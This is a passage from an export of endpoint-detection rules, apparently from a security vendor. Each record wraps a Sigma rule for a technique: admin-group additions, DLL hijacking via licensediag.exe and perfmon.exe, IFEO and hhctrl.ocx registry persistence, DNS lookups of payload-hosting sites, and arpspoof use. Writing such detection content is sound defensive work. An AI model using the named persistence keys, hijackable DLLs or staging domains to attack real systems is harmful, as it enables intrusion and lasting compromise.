"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072558Z",
"creation_date": "2026-03-23T11:45:34.072561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072565Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1098/",
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1098_add_user_to_local_administrators_group.yml",
"content": "title: User Account Added to the Local Administrators Group\nid: a9e0a63b-2a2b-41d1-839b-cb482e15edcb\ndescription: |\n Detects when a user account is added into the local Administrators group.\n Attackers can add a new user to the Administrators group to establish persistence on infected hosts.\n It is recommended to investigate the context of the detection and any suspicious authentications with the user newly added to the group to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2021/04/28\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: 'S-1-5-32-544'\n\n exclusion_joined:\n - MemberSid: 'S-1-5-21-*-512' # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: '$'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a9e0a63b-2a2b-41d1-839b-cb482e15edcb",
"rule_name": "User Account Added to the Local Administrators Group",
"rule_description": "Detects when a user account is added to the local Administrators group (Security event 4732 on group SID S-1-5-32-544).\nAttackers can add a new user to the Administrators group to establish persistence on infected hosts.\nNote that additions of the Domain Admins group (RID 512) and additions performed by computer accounts (subject user name ending in '$', e.g. during a domain join) are excluded, so changes made under the machine account context are not alerted on.\nIt is recommended to investigate the context of the detection and any suspicious authentications with the user newly added to the group to determine if this action was legitimate.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.003",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa235c35-c389-4966-93a2-da5f443718e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593712Z",
"creation_date": "2026-03-23T11:45:34.593716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensediag.yml",
"content": "title: DLL Hijacking via licensediag.exe\nid: aa235c35-c389-4966-93a2-da5f443718e3\ndescription: |\n Detects potential Windows DLL Hijacking via licensediag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensediag.exe'\n ImageLoaded|endswith: '\\winbrand.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa235c35-c389-4966-93a2-da5f443718e3",
"rule_name": "DLL Hijacking via licensediag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licensediag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa59cb20-2517-4d55-8264-d52dc9608856",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620617Z",
"creation_date": "2026-03-23T11:45:34.620619Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620624Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_registry_ifeo.yml",
"content": "title: Image File Execution Option Persistence Added\nid: aa59cb20-2517-4d55-8264-d52dc9608856\ndescription: |\n Detects Image File Execution Option persistence settings in registry. This is oftenly used by threat actors to gain persistence on a machine.\n Attackers may use IFEO as persistence or as a backdoor if it is installed on system binaries that are triggered for specific actions.\n It is recommended to analyze the process reponsible for this registry edit as well as to look for malicious actions by the same user around this alert.\nreferences:\n - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n - https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n TargetObject|endswith:\n - Debugger\n - VerifierDlls\n - MonitorProcess\n - VerifierProviders\n\n selection_rename:\n EventType:\n - 'RenameKey'\n - 'RenameValue'\n NewName|contains:\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Microsoft\\Windows 
NT\\CurrentVersion\\SilentProcessExit\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n NewName|endswith:\n - Debugger\n - VerifierDlls\n - MonitorProcess\n - VerifierProviders\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_details:\n Details:\n - '/'\n - 'Blocked'\n\n exclusion_known_verifier_providers:\n # default value on win10 (with old \" \" and new \";\" separator from our driver)\n # TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\{ApplicationVerifierGlobalSettings}\\VerifierProviders\n Details:\n - \"vrfcore.dll vfbasics.dll vfcompat.dll vfluapriv.dll vfprint.dll vfnet.dll vfntlmless.dll vfnws.dll vfcuzz.dll\"\n - \"vrfcore.dll;vfbasics.dll;vfcompat.dll;vfluapriv.dll;vfprint.dll;vfnet.dll;vfntlmless.dll;vfnws.dll;vfcuzz.dll\"\n - \"vrfcore.dll vfbasics.dll vfluapriv.dll vfcompat.dll vfprint.dll vfntlmless.dll\"\n exclusion_process_explorer:\n TargetObject|endswith: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\\Debugger'\n ProcessInternalName: 'Process Explorer'\n\n exclusion_psappdeploytoolkit:\n # 
https://github.com/PSAppDeployToolkit/PSAppDeployToolkit/blob/46c98f1caa99b1640fd890b6e76ce0409ac12724/Toolkit/AppDeployToolkit/AppDeployToolkitMain.ps1#L6123\n Image:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n Details|contains:\n - 'wscript.exe*\\PSAppDeployToolkit\\AppDeployToolkit_BlockAppExecutionMessage.vbs'\n - 'wscript.exe*\\PSAppDeployToolkit\\BlockExecution\\AppDeployToolkit_BlockAppExecutionMessage.vbs'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\Debugger'\n\n exclusion_choco:\n Image: '?:\\ProgramData\\chocolatey\\choco.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Chocolatey Software, Inc.'\n\n exclusion_solarwinds:\n Image: '?:\\SolarWinds\\Migration.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Solarwinds Worldwide, LLC'\n\n exclusion_windows_upgrade:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\windowsupdatebox.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupCore.exe'\n\n # https://github.com/AveYo/MediaCreationTool.bat/blob/main/bypass11/Skip_TPM_Check_on_Dynamic_Update.cmd\n exclusion_tpm_skip_check:\n ProcessCommandLine: 'reg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SetupHost.exe\\0 /f /v Debugger /d ?:\\Scripts\\get11.cmd'\n ProcessParentCommandLine|contains: 'Skip_TPM_Check_on_Dynamic_Update.cmd'\n\n exclusion_heimdal:\n Image: '?:\\ProgramData\\Heimdal Security\\Heimdal Thor Agent\\bin\\Heimdal.Wizard.exe'\n\n # https://github.com/rizonesoft/Notepad3\n exclusion_notepad3:\n ProcessProduct: 'Notepad3 (x64)'\n Details: '??:\\Program Files\\Notepad3\\Notepad3.exe? /z'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa59cb20-2517-4d55-8264-d52dc9608856",
"rule_name": "Image File Execution Option Persistence Added",
"rule_description": "Detects Image File Execution Option persistence settings in the registry. This is often used by threat actors to gain persistence on a machine.\nAttackers may use IFEO for persistence or as a backdoor if it is installed on system binaries that are triggered for specific actions.\nIt is recommended to analyze the process responsible for this registry edit as well as to look for malicious actions by the same user around this alert.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa658529-bd7e-4971-a104-d32ba0e109a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089148Z",
"creation_date": "2026-03-23T11:45:34.089150Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089154Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/hhctrl.html",
"https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_hhctrl_ocx.yml",
"content": "title: Possible hhctrl.ocx Persistence Added\nid: aa658529-bd7e-4971-a104-d32ba0e109a3\ndescription: |\n Detects the modification of the hhctrl.ocx registry key that allows setting a DLL to load when the hh.exe binary is used.\n This method is used as a means to set up a persistence mechanism that will be triggered upon the execution of hh.exe.\n It is recommended to check the legitimacy of the process that added the persistence as well as to look for malicious content in the targeted DLL.\nreferences:\n - https://persistence-info.github.io/Data/hhctrl.html\n - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKCR\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)'\n\n is_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_hhctrl:\n Details: '?:\\Windows\\System32\\hhctrl.ocx'\n\n condition: selection and not is_empty and not 1 of exclusion_*\nlevel: medium\n# level: high (to discuss during review)\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa658529-bd7e-4971-a104-d32ba0e109a3",
"rule_name": "Possible hhctrl.ocx Persistence Added",
"rule_description": "Detects the modification of the hhctrl.ocx registry key that allows setting a DLL to load when the hh.exe binary is used.\nThis method is used as a means to set up a persistence mechanism that will be triggered upon the execution of hh.exe.\nIt is recommended to check the legitimacy of the process that added the persistence as well as to look for malicious content in the targeted DLL.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-01-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa913aec-a1b1-4c7b-91c0-1098693481c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295522Z",
"creation_date": "2026-03-23T11:45:35.295526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295532Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://twitter.com/embee_research/status/1623908375242350593",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_dns_request_filehosting_linux.yml",
"content": "title: DNS Request to Suspicious File Hosting Website (Linux)\nid: aa913aec-a1b1-4c7b-91c0-1098693481c7\ndescription: |\n Detects a DNS request to a public file hosting service that may contain a malicious payload.\n This technique has been used by ransomware operators to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://twitter.com/embee_research/status/1623908375242350593\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2024/07/15\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: dns_query\n product: linux\ndetection:\n selection:\n QueryName:\n - '*transfer.sh'\n - '*gofile.io'\n - '*file.io'\n - '*send.exploit.in'\n - '*catbox.moe'\n - 'temp.sh'\n\n filter_browser:\n ProcessImage|endswith:\n - '/firefox'\n - '/firefox-esr'\n - '/firefox-bin'\n - '/firefox-devedition'\n - '/chrome'\n - '/google-chrome'\n - '/google-chrome-stable'\n - '/brave'\n - '/msedge'\n - '/librewolf'\n - '/chromium'\n - '/vivaldi'\n\n filter_dns:\n ProcessCommandLine: 'samba: task[dns]*'\n\n filter_resolver:\n ProcessImage:\n - '/usr/sbin/named'\n - '/lib/systemd/systemd-resolved'\n - '/usr/lib/systemd/systemd-resolved'\n - '/usr/sbin/unbound'\n - '/usr/sbin/pdns_recursor'\n - '/usr/sbin/squid'\n - '/usr/sbin/nscd'\n\n exclusion_amavis:\n - ProcessImage|endswith: '/amavisd-new'\n - ProcessCommandLine|contains:\n - '/amavisd (master)'\n - '/amavisd-new (master)'\n - '/usr/bin/perl -T /usr/sbin/amavisd'\n\n 
exclusion_zimbra:\n ProcessCommandLine: '/usr/bin/perl -T /opt/zimbra/common/sbin/amavisd * -c /opt/zimbra/conf/amavisd.conf'\n\n exclusion_squid:\n ProcessImage: '/usr/sbin/squid'\n\n exclusion_pdns:\n ProcessImage: '/usr/sbin/pdns_recursor'\n\n exclusion_traefik:\n ProcessImage:\n - '/usr/bin/traefik'\n - '/usr/local/bin/traefik'\n\n exclusion_mailscanner:\n ProcessCommandLine: 'MailScanner: starting child'\n\n exclusion_zen:\n ProcessImage: '/opt/zen/zen'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa913aec-a1b1-4c7b-91c0-1098693481c7",
"rule_name": "DNS Request to Suspicious File Hosting Website (Linux)",
"rule_description": "Detects a DNS request to a public file hosting service that may contain a malicious payload.\nThis technique has been used by ransomware operators to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2026-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa991822-87ec-4f97-961a-58f1bbd3db81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096995Z",
"creation_date": "2026-03-23T11:45:34.096997Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097001Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_perfmon.yml",
"content": "title: DLL Hijacking via perfmon.exe\nid: aa991822-87ec-4f97-961a-58f1bbd3db81\ndescription: |\n Detects potential Windows DLL Hijacking via perfmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ATL.DLL'\n - '\\credui.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa991822-87ec-4f97-961a-58f1bbd3db81",
"rule_name": "DLL Hijacking via perfmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via perfmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aaab50b4-5994-431b-85e4-0c007a681a95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598828Z",
"creation_date": "2026-03-23T11:45:34.598831Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598839Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://en.wikipedia.org/wiki/ARP_spoofing",
"https://attack.mitre.org/techniques/T1557/002/",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_arpspoof.yml",
"content": "title: MITM ARP Spoofing via arpspoof\nid: aaab50b4-5994-431b-85e4-0c007a681a95\ndescription: |\n Detects a command-line related to the execution of arpspoof, a command-line utility for conducting ARP Spoofing.\n ARP Spoofing is a technique used by attackers to impersonate a particular host to other nodes on a network, redirecting any traffic meant for the spoofed host to the attacker.\n It is recommended to investigate any potentially malicious actions preceding the usage of arpspoof.\nreferences:\n - https://en.wikipedia.org/wiki/ARP_spoofing\n - https://attack.mitre.org/techniques/T1557/002/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/04/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1557.002\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Arpspoof\n - classification.Linux.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arpspoof'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aaab50b4-5994-431b-85e4-0c007a681a95",
"rule_name": "MITM ARP Spoofing via arpspoof",
"rule_description": "Detects a command-line related to the execution of arpspoof, a command-line utility for conducting ARP Spoofing.\nARP Spoofing is a technique used by attackers to impersonate a particular host to other nodes on a network, redirecting any traffic meant for the spoofed host to the attacker.\nIt is recommended to investigate any potentially malicious actions preceding the usage of arpspoof.\n",
"rule_creation_date": "2024-04-16",
"rule_modified_date": "2025-04-14",
